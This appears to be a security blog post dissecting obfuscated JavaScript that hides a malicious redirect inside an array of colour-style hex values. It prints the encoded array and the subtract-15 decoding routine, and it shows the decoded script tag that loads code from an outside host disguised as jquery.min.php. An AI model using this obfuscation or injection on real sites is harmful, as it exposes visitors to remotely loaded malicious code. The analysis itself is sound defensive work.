Javascript Obfuscation Using Colors?

No, not at all but the Javascript code does look like it’s just trying to process hexadecimal representations of various colors. Let’s take a closer look at the script:

If this was found on a webpage, you might just overlook it as something benign. It’s a clever concept!

It starts off by defining an array of hexadecimal values which look like a representation of different colors.

new Array(‘#4b8272′,’#81787f’,’#832f83′,’#887f74′,’#4c3183′,’#748783′,’#3e7970′,
‘#857082′,’#728178′,’#7f8331′,’#2f8281′,’#724c31′,’#778383′,’#7f493e’,’#3e7a84′,
‘#82837e’,’#40403d’,’#727e7c’,’#3e7982′,’#3e7980′,’#847481′,’#883d7c’,’#787d3d’,
‘#7f777f’,’#314d00′);

The function “div_pick_colors” concatenates them into one long string after ignoring the pound sign. You end up with this:

4b827281787f832f83887f744c31837487833e79708570827281787f83312f8281724c317783
837f493e3e7a8482837e40403d727e7c3e79823e7980847481883d7c787d3d7f777f314d00

The same function then grabs two characters at a time and does some fancy footwork to convert it into a malicious redirect. Here’s the code that does the conversion:

s += String.fromCharCode(parseInt(c_clr, 16) – 15);

Let’s go through this quickly…

Get the first two characters from the string above (which is “4b”).
Convert it from hexadecimal to decimal (you’ll get “75”).
Subtract 15 from the decimal value (which is “60”).
Now convert the decimal value to ASCII (you’ll end up with “<"). Now do the next one... Get the second two characters (which is "82"). Convert it from hex to decimal (you'll get "130"). Subtract 15 from the decimal value (which is "115"). Now convert the value to ASCII (you'll end up with "s"). If you continue along, you'll end up with the following redirect code: <script type="text/javascript" src="http://kusto11.com/js/jquery.min.php"> If you want to cheat, you can insert an alert into the script which will popup the redirect code in one fell swoop.

The rest of the code appends the date/time value to the URL and executes the code.

In case you’re wondering what those hexadecimal values actually look like if they rendered into colors, well it looks like this:

It kinda looks like a scarf I got for Christmas.

This entry was posted in Malscript and tagged , . Bookmark the permalink.